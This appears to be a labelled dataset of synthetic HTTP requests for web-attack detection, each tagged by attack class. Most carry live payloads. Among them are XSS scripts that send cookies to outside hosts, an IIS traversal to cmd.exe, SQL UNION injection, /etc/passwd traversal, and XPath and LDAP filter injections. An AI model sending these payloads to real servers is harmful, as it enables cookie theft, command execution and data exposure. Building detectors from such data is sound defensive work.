Proxy-Authorization: Basic Y2VsZ2luZTpmYW5vOUUz
Authorization: f77db aetmsn=Lobo5twv
Range: -87,-41
Referer: /titee.bin
TE: trailers,trailers,deflate
Trailer: Host
User-Agent: 1aoftide
UA-CPU: Sparc
UA-Disp: 457,6373,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2245x173
Via: 0.2 www.ehmg5rs.css
Transfer-Encoding: gzip
Upgrade: nteIn/8.4, ihne/7.6, mbtti/6.3, lts/2.7
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 93268691782079750245
----: ----------------
~~~~~: ~~~~~~~~~~~

eeOt4tddRGr=u&rItieoeseaoh=<!-- -- --><script    >[window.open('http://166.196.58.178/ator.bin'+document.cookie);]</script><!-- -- -->&as2hf3raknw9l=234130&dgl=u Elib&an=ttFmRtpwe9e&e2bh7nt6lCo5h=mec&wcioaeuenfnjsE=Tsyhtleillgreha&CWQQS=982&1paTeynntqk8=pfcM2esauon

End - Id: 46887
Start - Id: 44114
class: OsCommanding
GET /msadc/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 74.221.236.63:80
Connection: RtTd
Accept: image/jpeg, text/*;q=0.5
Accept-Charset: x-mac-hebrew;q=0.0, euc-tw;q=0.3, iso-2022-kr;q=0.2, x-mac-icelandic
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: max-age=463
Client-ip: 249.225.32.40
Cookie: ieArhRi1dxew=7Iem;ensa3oqTphy=aevalmt;0neRnNAea;otpaTewcoradsni=6prfttnsts)iwgincluden3e;ftdacuuacn=d;zb5j;erMdebQpr5tlRsr=422201547
Cookie2: $Version="154"
Date: Wed, 18 Oct 06 21:04:33 GMT
ETag: "6ppIn19@NaQSoJPiB"
Expect: Th96mnA=tqacz8;9tlhaitl=hccct1
From: nvabn6ks@5obcxtres.uk
If-Modified-Since: Tue, 24 Mar 09 02:34:02 GMT
If-Unmodified-Since: Sun, 09 Apr 06 21:55:04 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 15 Apr 08 05:32:13 UTC
Max-Forwards: 4
MIME-Version: 5.1
Pragma: conk='t2'
Proxy-Authorization: gshvr 8nlhfa=tayazbek
Authorization: NTLM Y3RzYnN2Y2VubG4xZTBjZG56ZW91aWxlV3RhbnlycGZldA==
Range: 827-
Referer: /ir1hznw/mcUs/6uozoe/hltb/Wibnlgo.jsp
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: Mozilla/4.6 (compatible; MSIE 1.9; SunOS sun4u; telnRert; aesE8; rdl0orDfk)
UA-CPU: x86
UA-Disp: 224,424,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1501x189
Via: 9.7 www.dyo3eslN.png, FTP/0.2 www.aica.tiff, 5.8 www.rsind045.html:514
Transfer-Encoding: gzip
Upgrade: fnueh/3.8, a9n2i9/3.6, nbit/5.9, ydtTto/6.5, ryee5/2.9
Warning: 378 196.189.21.245:66 "hoiooiLnwuhilt51e" "Sun, 15 Jan 06 06:34:10 UTC"
X-Forwarded-For: 2.74.16.0
X-Serial-Number: 008751
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44114
Start - Id: 47128
class: XSS
GET /hNK8VvJum0UN@/2pwmrhdterzrwbxba/FformMqU-9eU/uT5DNqMD4htpass8oYm/teopdo6oliIehtyfn/ln/nNpr/h@REE@AladHI6x4aRBRt/dlg.css?1Dz1R3Htcxscriptg=47163&Oiftdjn=%3Cinput+++type++++%3D+++%22image+++%22+++++dynsrc+%3D++++%22++javascript%3A+%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.roerde.com%2Fcgi-bin%2Fte.cgi%27%2Bdocument.cookie%29%3B%5D+%22%3E&peiigsef6niwaa=03&33euneqlaoii=6 HTTP/1.1
Host: 204.47.110.141:80
Connection: close
Accept: image/*;q=0.0, application/rtf;q=0.3
Accept-Charset: windows-1251
Accept-Encoding: identity, identity;q=0.5, deflate;q=0.9
Accept-Language: ne5irl-lw
Cache-Control: max-stale
Client-ip: 130.149.173.192
Cookie: c4feIaxp4=utae~;lsao=tHxIj
Cookie2: $Version="7"
Date: Tue, 25 Jan 05 19:14:32 CET
ETag: "mQNu2WqrXNJIUGh7"
Expect: 100-continue
From: dy0mird@eelb.it
If-Modified-Since: Sat, 25 Jun 05 11:49:31 GMT
If-Unmodified-Since: Sat, 25 Nov 06 06:53:58 CET
If-Match: *
If-None-Match: *
If-Range: "pkvVXtr2O-4U7WTH"
Max-Forwards: 46
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: NTLM ZGhvbmJpc2FjNHJvaWEzbW93aFJybmNzdHV1aG9lb3Rhd2h1czc=
Range: -63707,310050-133
Referer: /efcri/uoli.bin
TE: gzip
Trailer: Warning
User-Agent: 9one (hebZ9kzSvT)
UA-CPU: 68000
UA-Disp: 016,6175,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7372x166
Via: 3.4 121.10.1.78, fncc/4.0 56.96.91.18:704, FTP/7.3 86.72.132.212
Transfer-Encoding: gzip
Upgrade: suae0/1.2
Warning: 339 51.64.209.7 "6Kirtt2tetFxoo" "Fri, 17 Oct 08 02:00:42 UTC"
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 42655
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47128
Start - Id: 35477
class: XPathInjection
GET /9erRs/rzsuiesOmaow/il57OnQaupi9hfCYvpP/eonKsoxmasNasbnlAped/1iols6ptilnon/QNNQI@PP9nph-GZ9pv/erBtio4isv.dll?6iad4wtioTe9zl=83987&dtinydtib=AwnPn3aiariaaii1s&4oebd2n=ehirdeleteeeconnectah7oegt%2B&iframeCboot.inixn=mxtermgosmr&xis=addfrn&Datow=a%5Crobjecttpnkr&6qTgOT=ieptt&eewmmsNueer=esn&ra0tosu=%5D%3ETrersss%26em&ndhyt=8667722&NlhecD6dtx=+a+zQtTagi%24us HTTP/1.1
Host: 22.83.121.123:02
Connection: close
Accept: */*
Accept-Charset: windows-1250;q=0.0, x-mac-turkish, iso-10646-ucs-2;q=0.1, iso-8859-5, windows-1251
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-age=17566
Client-ip: 187.106.55.95
Cookie: tWoghfulits=gohzm2TA5
Cookie2: $Version="796"
Date: Mon, 31 Mar 08 18:24:55 GMT
ETag: W/"1H-iowdvQC0IIM-uc"
Expect: nenTdl
From: djepela@Ereu.st
If-Modified-Since: Wed, 25 May 05 04:58:33 CET
If-Unmodified-Since: Tue, 10 Apr 07 03:02:06 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1011
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: aisd RhjLhrht=aojbCnu
Authorization: NTLM aXJTc3lhYWE0eWFuTWVpcHBzbnVpcmRvYTFubnRhbHVuY3k0MmE=
Range: 6-
Referer: /wllHiosb.js
TE: trailers,gzip;q=0.4,trailers
Trailer: If-Match
User-Agent: 8304    or e/y/Re/child::node()[position()=18]    or   694=
UA-CPU: x86
UA-Disp: 1801,706,8
UA-Color: color8
Via: 4.7 221.3.187.233, 0.6 www.ahK8es.jpg
Transfer-Encoding: nhhqnE; smEhr=6Bhpnnvc
Warning: 250 www.tety.png "cOT1L" "Mon, 07 Nov 05 24:41:43 CET"
X-Forwarded-For: 140.122.154.142
----: ---------------------------------

null

End - Id: 35477
Start - Id: 35513
class: XPathInjection
GET /WQw1QvvY/aee/ed7O8@YvRej-kme8M4./Muxps/otClTsEdcNbf/mu8rcW._Zi8aKK/EserviceshmPtxid/lo1rEufOss/xPOA_A/ijIemnyeo3nHor/fhlg2eraz/lFMkq.js?Ihincludewp-wY=69471&gtukTefbomIvobI=nlrni&JLhhh2mAopenfecho=6427&bx3erwlEc6Nitn=n_d&oeop93Pe3=dX-m-wvdCeB&1etve=Z+he%5Cbintinarat&fyNuFbaeyse4x=ahKuah6ZtPG&1Astsce7oqO3Tso=oteh&sf3eawn1Odem=1 HTTP/1.0
Host: www.aqegor.ch
Connection: nemOclsn
Accept: image/*
Accept-Charset: *;q=0.0
Accept-Encoding: gzip, identity;q=0.0, gzip, compress;q=0.4, identity;q=0.8
Accept-Language: *;q=0.7
Cache-Control: max-stale=704
Cookie: 5p9m=tfum'     or     (i  <     count(5fge/child::text())     and    j  <  count(hre/child::comment()) and    k   <     count(ms4sem/child::*)    )     or     'ahh'   =   ' aa0'   or
Date: Sun, 27 Jun 04 02:33:09 CET
From: inme2@iaidaa.net
If-Modified-Since: Sun, 19 Jul 09 03:20:18 UTC
If-Unmodified-Since: Sat, 12 Feb 05 21:09:32 CET
If-Range: Sat, 15 Jul 06 02:56:19 CET
Max-Forwards: 99
Pragma: no-cache
Authorization: Digest username="uaea0ttH"
Referer: /tusbw.asp
User-Agent: ShzIlwsit7Aroaoeox
UA-OS: Windows NT
Transfer-Encoding: deflate
Upgrade: k9htty/6.1
Warning: 819 www.Mlrn.htm "AeeEilpplhgfylE" "Thu, 09 Mar 06 04:23:11 UTC"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35513
Start - Id: 37732
class: LdapInjection
GET /hole8hoalnC2r/tP/httpk_MOcZyf4_/7eos/sAracT4tioia/0nDEMqXG2.php?neiehvimosbn0=%3C&Yho=%29++%28%7C%28aoai%3Deg3*%29 HTTP/1.0
Host: 244.21.16.156
Connection: 66rA
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: deflate;q=0.9, identity, compress;q=0.8, compress;q=0.1
Accept-Language: *
Cache-Control: no-transform
Client-ip: 7.203.36.66
Cookie: w2FOvF=bC\tn e(Ophp;oyelrshb=bEn;et=a4PZa.fO;tbn0yneeoiuuofw=atNtrl6ceaceaoen
Cookie2: $Version="8"
Date: Wed, 24 Sep 08 05:15:46 CET
ETag: "5II8sc8ciUVdrRtHqjP"
Expect: fniL
From: Iiydrs@AboeNOsxe.biz
If-Modified-Since: Fri, 10 Mar 06 15:12:26 CET
If-Unmodified-Since: Fri, 23 Dec 05 20:14:21 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 22 Apr 06 05:47:16 CET
Max-Forwards: 5886
Pragma: no-cache
Authorization: Basic dXR4ajpsamRQdGg=
Referer: /mrpf5i/p7nCctgb/8e51kehe/dmwt/ods79lt.txt
Trailer: From
User-Agent: m0owireuUc (aTX@ZxtEzw; a3TH5GUm; 0qKDTiq; ohlL2qFK9T; 7hqGUAVr)
UA-CPU: x86
UA-Disp: 756,0789,32
Via: 7.2 www.rciTguif.jpeg, 0.1 115.201.125.201
Transfer-Encoding: gzip
Upgrade: 4da/3.4
Warning: 042 159.74.80.149 "suceomxh0hepmsponr2" 
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37732
Start - Id: 42071
class: SqlInjection
GET /8Z2ufUphpin/NyszssipinEe/samA/ihttatlrrrejws4bepo/b@Ofu847ov/a44W40xeyI/ehy1ne9tteoiHnyeta/Ote.htm?pznebnsiniOu=%27+++%29+++UNION+ALL+SELECT++%27nrit%27%2C527%2C0740%2C%277RvSi%27%2C788+++++FROM+++++ayc06js+WHERE++++%28++++%27%27+%3D++%27&cixshkiSi=zdeletem8r HTTP/1.1
Host: 219.190.27.62
Connection: keep-alive
Accept: audio/x-wav;q=0.6, image/*, image/*
Accept-Charset: x-mac-chinesesimp;q=0.4, windows-1250;q=0.9, windows-1253, x-mac-hebrew, euc-kr;q=0.7
Accept-Encoding: 
Accept-Language: 4-aN, lpw-pddt;q=0.8, ts-Osr4;q=0.7, re5eea-9
Cache-Control: max-stale
Client-ip: 18.205.184.49
Cookie: Enupln4Ie8=3hL;hihorFrinuhno=ieA;tel=9417;ennCSgel=tLsuWc
Cookie2: $Version="960"
Date: Fri, 09 Jan 04 04:11:01 GMT
ETag: "1pNrCI08loZx0@fmb"
Expect: dntttuy
From: mwetzo8a@ourctd.net
If-Modified-Since: Tue, 16 Mar 04 03:30:05 CET
If-Unmodified-Since: Tue, 02 Oct 07 22:49:22 UTC
If-Match: "WZChvulT.sOUImsYO"
If-None-Match: *
If-Range: Thu, 17 Sep 09 07:08:17 UTC
Max-Forwards: 3725
MIME-Version: 0.9
Pragma: IJoyr='uuhy'
Proxy-Authorization: miIioo U7Eesss=eomtuaa
Authorization: Basic YTFmZm46bmhuaWti
Range: 97-55
Referer: http://2Ilo.ch/j7kn2/uoan9oiy.pl
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: comCev
UA-CPU: Sparc
UA-Disp: 7502,392,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 4241x2926
Via: 1.0 161.174.53.24, HTTP/2.2 www.orfEun.js
Transfer-Encoding: deflate
Upgrade: zes4g/0.4, bti/7.1
Warning: 537 38.107.5.37 "lwo1hwxdnein" 
X-Forwarded-For: 39.4.112.68
X-Serial-Number: 702887096
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42071
Start - Id: 35527
class: XPathInjection
PUT /tkqeGtm8lhiNrnEapk/G@5Rbebinw70m2JVy/oEJ/ACDJg-/mail19@K8RGUfizTgN/Biframe4hHhttpsf7xuPC/g-d9weji/rI2tk20h4.jsp? HTTP/1.0
Content-Length: 359
Content-Language: itcy,3sHj
Content-Encoding: deflate
Content-Location: /ontAaNm/bewo/s3qlc/ttge.php4
Content-MD5: bGhxa3NPaHdTMW5Lc25FdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 05 Nov 06 16:34:15 CET
Last-Modified: Sat, 21 Jun 08 12:53:18 CET
Host: www.hsgrmtro.be
Connection: close
Accept: text/*;q=0.9, text/*;q=0.3, video/quicktime;q=0.1
Accept-Charset: x-mac-cyrillic, iso-8859-5;q=0.7, x-mac-turkish;q=0.6, x-mac-cyrillic, x-mac-icelandic;q=0.4
Accept-Encoding: compress;q=0.7, compress;q=0.5
Accept-Language: *
Cache-Control: Ygetrie2=0
Client-ip: 106.66.65.58
Cookie: LUboot.iniaOEVy=24472;168sqtrrtolps=erR
Cookie2: $Version="891"
Date: Sun, 11 Apr 04 01:54:53 GMT
ETag: "pjVM2@qz7S7-tpwC"
Expect: Zgse=teneo;otninw=mnsa
From: ddsory@ail3hIue.st
If-Modified-Since: Sun, 09 Jul 06 11:55:54 CET
If-Unmodified-Since: Sat, 05 Mar 05 10:12:38 GMT
If-Match: "OR_kl7Ja7xN5J4NK"
If-None-Match: "KEvsj_Yu0hTdM9t"
If-Range: Tue, 24 Feb 04 22:14:18 GMT
Max-Forwards: 882
MIME-Version: 5.3
Pragma: ena='amtet'
Authorization: NTLM dDZ0aGV0c2w3c2toZThlZWVvd3RmNnRpTWVuYU5hYXJpc25oVDVOYXN0cg==
Referer: /se3rIy.php
TE: trailers
Trailer: Max-Forwards
User-Agent: zhwi9y (pGffuDKHRx; tHYGRl; isiUnoGNh; hOB@2wD)
UA-Disp: 740,794,8
Via: HTTP/2.0 40.243.44.154, 6.4 www.tnxyl.shtml
Transfer-Encoding: identity
Upgrade: hs1gw/0.3, rdt/3.0
Warning: 729 81.169.14.55 "k7tiinwireni" "Mon, 24 Dec 07 19:28:46 GMT"
X-Forwarded-For: 182.111.185.137
----: ---------------------------------

HPhWpPDkOvbscript=sail&Hbfx=1234&emq=715516&denpeFg=bitrf'3isun&8anopi=dpyiqnmm1 n1nl<&oRLuernrlod=38837&ta6eatlsbtntmme=sjiSqoX72pzV&eddl=ztmov&hs8h=dd8cietmtma&aneetfsrtthznr=63250&sthesqlit=atheyxrtige3pu&armr=lIsgr3siiabts0Ti&Tgt7rj=ohRwRlF86hl&S5Ty=stuo&aob=741    or    sarx/ocmya/efcih/child::node()[position()=819] or  6=

End - Id: 35527
Start - Id: 49093
class: XPathInjection
GET /dcR3yJ1iGKXuX/aAafxaozccatu/e9ip.cgi?OTRL4nmTW=by%3F%40htacces&ooezo=29uaaca&algSaa1=nt&gOetVEiti=13322470&isieuogf=sa9%27%5D+++++%7C+++P+%7C+++%2F%2Fuser%5B+++name%2Ftext%28+%29++++%3D+%27nsto&sshagsgnd=oi%3Bgk1eT5n%3Bt HTTP/1.0
Host: 192.120.149.2
Connection: daieLia
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: compress;q=0.0, identity;q=0.9, identity, identity;q=0.8
Accept-Language: *;q=0.4
Cache-Control: min-fresh=72799
Client-ip: 215.194.111.216
Cookie: 7cAcai4otqttnp9=3;l9edatAet=T(csn1l7;p7DX1UzQj_td=koaeabi3unauuimn
Cookie2: $Version="21"
Date: Wed, 14 Jan 04 18:24:56 CET
ETag: "9zbdhmHRPBJn6NucEb"
Expect: dfeh5=siacsoEI
From: oayjh@w9ulna6.biz
If-Modified-Since: Tue, 16 Sep 08 03:12:22 GMT
If-Unmodified-Since: Fri, 02 Dec 05 16:21:54 GMT
If-Match: "YX24meIygT5cF8U6B"
If-None-Match: *
If-Range: Sun, 13 Nov 05 20:50:30 UTC
Max-Forwards: 9
MIME-Version: 4.7
Pragma: clui2pz=7Ew
Proxy-Authorization: bAo1v ibijaido=uede
Authorization: 2ipAia yi2t1Oap=ceesw
Range: -21
Referer: /inet/oeesjH.rar
TE: deflate
Trailer: Referer
User-Agent: egrAmhaa4oowehrs
UA-CPU: StrongARM
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 7313x7197
Via: 8.9 www.fhLf.jpg
Transfer-Encoding: deflate
Upgrade: aau/4.8
Warning: 032 www.mhnSre.js "nIcaleerr" "Sat, 08 Jan 05 06:49:45 UTC"
X-Forwarded-For: 46.39.13.172
X-Serial-Number: 7433292
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49093
Start - Id: 37699
class: LdapInjection
POST /twa/CAkARnsAmincludeT/gOUT4I6.NUr/c56X0cgRrSA6o/x7nP.sh? HTTP/1.0
Content-Length: 227
Content-Language: gGqadn,usre,b
Content-Encoding: gzip
Content-Location: /C2emoece/nhboIl/oeaaTno.ace
Content-MD5: MXRoOGVwbWF0Nmlwb2t0ZA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 02 Nov 08 03:24:45 GMT
Last-Modified: Mon, 17 Sep 07 10:12:52 CET
Host: 2.27.72.81
Connection: yosnv
Accept: image/*, audio/x-wav;q=0.9
Accept-Charset: windows-1255, cp-950, windows-1250, hz-gb-2312
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 237.81.61.20
Cookie: arm@%un3uQNk=8;xpmatpkaemOtl=naG7M;eR=rrt%7E%25sata0n4ei
Cookie2: $Version="49"
Date: Fri, 08 May 09 09:58:25 UTC
ETag: "n4cBYNpmLWIikXUq4-kH"
Expect: 100-continue
From: thGyc@rjbnmtcw.gov
If-Modified-Since: Sun, 30 May 04 15:26:48 UTC
If-Unmodified-Since: Thu, 18 Dec 08 03:12:17 GMT
If-Match: *
If-None-Match: *
If-Range: "aZK5oU0xpZjJNXu"
Max-Forwards: 2653
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: NTLM bTRhZWRxbDBkaWhlcmFydXJtSGVvMWN0cHJlZWNuZG1lamVsbw==
Authorization: tdzb to2mOt=teiOOsx
Range: 90513-
Referer: /teendoam/ti5gtMnx.php
TE: chunked,gzip;q=0.3,deflate
Trailer: Accept-Language
User-Agent: Mozilla/2.6 (compatible; D0Oh; Linux i386; i1EethdeE; cmtX; raltswDp0)
UA-CPU: MIPS
UA-Disp: 5884,733,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 940x1719
Via: grh/2.4 www.ss9sch.htm:1
Transfer-Encoding: compress
Upgrade: oia/6.0, uNfl/8.0, net/8.9, ai8/5.6
Warning: 819 www.ttnhr.shtml "rog8prr93m" "Wed, 03 Mar 04 11:36:52 UTC"
X-Forwarded-For: 66.23.157.210
X-Serial-Number: 3901331377594
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

osibarTvitae=[&Fgo4ge=4uU2zB&9xkui=)(    |(displayName=had*)   (name    =   had*    )(mail=had*  )&i2ncwJiexm=v/all&n5yiecTe=3eantBC&efe8earerta=en&cide=s&cfeuaqidhxtfiy=l'a0o&Ib04.Y=tziweedoewmerb

End - Id: 37699
Start - Id: 35962
class: PathTransversal
GET /dmIfHTXLP7N5KIJQYT/mdB22N7.msf?qzPGCwc-=%2Fi4teennihomeptth&E6TtrlfiyRr=s0l9eia%3D4x7r+&sedXtmpznsnkFk=o&3Vlgc=Thtue HTTP/1.0
Host: www.htnoaia.de
Connection: keep-alive
Accept: image/jpeg;q=0.6, image/*;q=0.4, text/*;q=0.3
Accept-Charset: utf-8, x-mac-cyrillic, x-mac-turkish;q=0.8, iso-2022-kr
Accept-Encoding: *
Accept-Language: rn-wbItls, oo-ene;q=0.1, L-pmUnht;q=0.8, hn-rhtafard;q=0.1
Cache-Control: no-cache
Date: Wed, 25 Oct 06 11:45:37 GMT
ETag: W/"NKbJpRBfD618sorWh"
From: eunh@aicada.org
If-Modified-Since: Sat, 15 Mar 08 04:57:14 CET
If-None-Match: *
Max-Forwards: 78
MIME-Version: 4.8
Pragma: n86ooadm='ltenNoe'
Authorization: Digest algorithm=oiu3
Referer: http://www.eicae8.gov/5Anajo/hhestls/hmtari.jpeg
TE: deflate,deflate,trailers
User-Agent: \autoexec.bat
UA-Pixels: 030x7263
Via: 5.4 www.oget4.js, 9.1 www.owbiaoei.shtml
Transfer-Encoding: gzip

null

End - Id: 35962
Start - Id: 49351
class: XPathInjection
GET /9ASOeEd/t3oocu632stjxlu/crq_hgwpl7/XdF1execFxx%ushutdownj8/lOio0qAf.shtml?tAdrwo=et&DHIQyVFPDdm=ts0Afz6k&gnpnnOe=4+483%40s&W5iNe=pZh1tTw8sB&bmthXeurbw6sm2=nal%27++or++6+++%3C++++count%28path%2Fchild%3A%3A*%29+++++or++++%27Pv1%27++++%3D+%27&aae64ac=p9&GoUp=fa+o&h8as=%5Bdrmee&ets=pl6BbJk0GOw%40&oFeUrzon6r=zcv&mda2=ldtfN%24jodHurnm HTTP/1.1
Host: 101.8.142.73
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-1;q=0.3, x-mac-roman
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.0
Cache-Control: max-stale=468
Client-ip: 144.73.134.163
Cookie: osedsihricDh3r=aooene&nr;etrengotaderhsi=rceVmEJO;SetiTierrgh=Di2d7i3Mnpa
Cookie2: $Version="08"
Date: Fri, 12 May 06 03:13:13 CET
ETag: "VgXzljIoer326IDB1Rm"
Expect: nteo1rm=hlxEErme
From: EgerC@tafwi.com
If-Modified-Since: Tue, 24 Oct 06 20:10:21 UTC
If-Unmodified-Since: Mon, 21 Nov 05 13:04:21 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 2.9
Pragma: aI=tHeysf
Proxy-Authorization: NTLM ZWxpanNqcm1TNm5JaWRyTHI4aHNobzNtVHZsdHRhb2Y4b3Jz
Authorization: Digest qop=auth
Range: 896-
Referer: http://etlo.cz/Iit9s1es/ielOaxd/ticyne4l.php4
TE: chunked,chunked;q=0.9
Trailer: Accept-Encoding
User-Agent: Mozilla/4.1 (compatible; MSIE 9.2; SunOS sun4u; aTeeshr)
UA-CPU: StrongARM
UA-Disp: 646,996,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 953x2070
Via: 3.6 www.icidl6pn.jpeg, 3.4 www.nott.shtml, 8.4 www.8iN5T.htm
Transfer-Encoding: compress
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 168 180.56.143.92 "19ohloeeIes" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 68426632486242488
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49351
Start - Id: 38526
class: LdapInjection
GET /oaqeb8ylim7aerEri7a/d3ndafer5ss/te1smtdnyasn/etahimlrNadseeltEsde/hosmlewudabieotls.jpg?rojesRc=alloIoc&ehtmesuammhsr=mpassthruo&aupeaxr6=documentqoypAxtermo&3sonae=8s7%29%28%26%28objectClass++++%3Dbh*%29&wht=erstHoiH&ineiicyb=emp&sr6mij1ekr=dhqara&eetenbceaAas=rgrS&eena3ia=981853 HTTP/1.0
Host: 200.46.212.249:74346
Connection: close
Accept: */*
Accept-Charset: x-mac-turkish, windows-1253, windows-1258;q=0.6
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: no-cache
Client-ip: 127.100.106.138
Cookie: teeuospl=>e ;6w=~nl;e6cuneiesma=tz0VQVaZV;nefnt2eVuta=i.4uZZB
Cookie2: $Version="13"
Date: Thu, 19 Aug 04 11:33:03 GMT
ETag: W/"6cabhDopjWR86jSj8-"
Expect: lsfu4ai=3wee;e2mko=metMe
From: tubi@0dr5so.de
If-Modified-Since: Thu, 19 May 05 04:33:52 UTC
If-Unmodified-Since: Wed, 09 Mar 05 16:23:56 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 18 Apr 08 14:26:54 CET
Max-Forwards: 702
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: NTLM Z2RpZWZmYTBGUG1yQWRpSUhuUnQ5SjNpbzNzSWxuZXJVYXRzdGlvZW1veGxJbGlh
Authorization: NTLM YmV3eWVkbGVkM2RvbFFzZW5td0RhYTNUQ3RkZWdzOG4=
Range: 548411-,-37195
Referer: /qnokntl/aeea/ohNkt.bin
TE: deflate;q=0.3,gzip
Trailer: If-Range
User-Agent: oob2ddyoj http://www.tlEhtjwo.st
UA-CPU: MIPS
UA-Disp: 8582,573,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 8726x4401
Via: 3.7 77.254.115.145, 1.0 150.49.36.91
Transfer-Encoding: deflate
Upgrade: piFi/9.7, A4e1/7.0, 7lsnih/3.7
Warning: 494 103.11.37.183 "1br62beg" 
X-Forwarded-For: 101.186.114.243
X-Serial-Number: 30599
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 38526
Start - Id: 36309
class: PathTransversal
GET /eIcas7on8Shru8tlh/8a6shttpulGl/tArPivu/rgOsSgORM7Ir/HroNeftpj.html?xlevMnisdUm=j7d&sTKOBI_=8inuBlic&iq=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd&ra=7e%3A&isonnster=n+cort6 HTTP/1.1
Host: 222.236.70.1
Connection: eejbFo1t
Accept: */*;q=0.5
Accept-Charset: cp-936;q=0.2, iso-8859-15, x-mac-turkish;q=0.9, x-mac-cyrillic;q=0.0
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.0
Cache-Control: ls=isai
Client-ip: 145.8.91.154
Cookie: TmjhntueiuGgC=njaeeefyerge;hiU8=Oiruwgepaoa;tsToA6f1me9=leteyahttpsh<;hdsorhc=whereh;uhY7aidoaflyd=a
Cookie2: $Version="25"
Date: Sun, 07 Aug 05 05:25:11 UTC
ETag: "PR@C.gH8sSbya5og"
Expect: 100-continue
From: 5ygo@eiccrasaq.org
If-Modified-Since: Sat, 18 Nov 06 02:09:20 CET
If-Unmodified-Since: Sun, 06 Mar 05 22:16:42 UTC
If-Match: "hyQcQJFAqasYIg81"
If-None-Match: *
If-Range: Sat, 24 Apr 04 07:49:41 GMT
Max-Forwards: 693
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic dWRVMWF0QWg6bnlwc3Q0ag==
Authorization: Basic bXMxZXJobzpzYXVyaWg=
Range: -24492,6727-90720
Referer: http://t7mn.be/mlua/oO3tnc/nRhrsTa/i8yig/iut4i1e.jpg
TE: chunked,deflate;q=0.4
Trailer: Cache-Control
User-Agent: sn3eso
UA-CPU: MIPS
UA-Disp: 505,9391,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 645x5981
Via: 1.6 www.erott.gif
Transfer-Encoding: gzip
Upgrade: oafi/4.5
Warning: 925 www.seESe.gif "aoh3bha8hrc" 
X-Forwarded-For: 87.172.119.89
X-Serial-Number: 10989646571343616
----: -------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 36309
Start - Id: 49486
class: XPathInjection
GET /nD_yJ9orMQ/MT6h3KZ-TaRrUE2/blNnM2bTv7IbHcG4a/8hmo6lsblwe/QN/thpeaht/o7mNdncfutih3m/i2htrANfkns/fM5J__njxuZOD2Y/yAEev/hi6l2ye.dll?eseeisns=y%2FlaEU%2F1yKd%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D4%5D+++++or+++%27Hboae%27+++%3D++%27&6sonia=442398 HTTP/1.1
Host: 161.96.89.76:80
Connection: o3biw
Accept: */*;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 243.204.148.120
Cookie: ee4=3;UYa4DUekur1=421204255;etnHole3uoemo=27206546
Cookie2: $Version="3"
Date: Sat, 10 Feb 07 19:39:23 GMT
ETag: W/"8WDs@-d9IdX423MDOwo"
Expect: 100-continue
From: H4ft@ataqsdls.net
If-Modified-Since: Wed, 27 Jun 07 19:14:08 GMT
If-Unmodified-Since: Sat, 08 Dec 07 17:06:32 GMT
If-Match: *
If-None-Match: "WUznIkBAx-Ym0liD6wgx"
If-Range: *
Max-Forwards: 4696
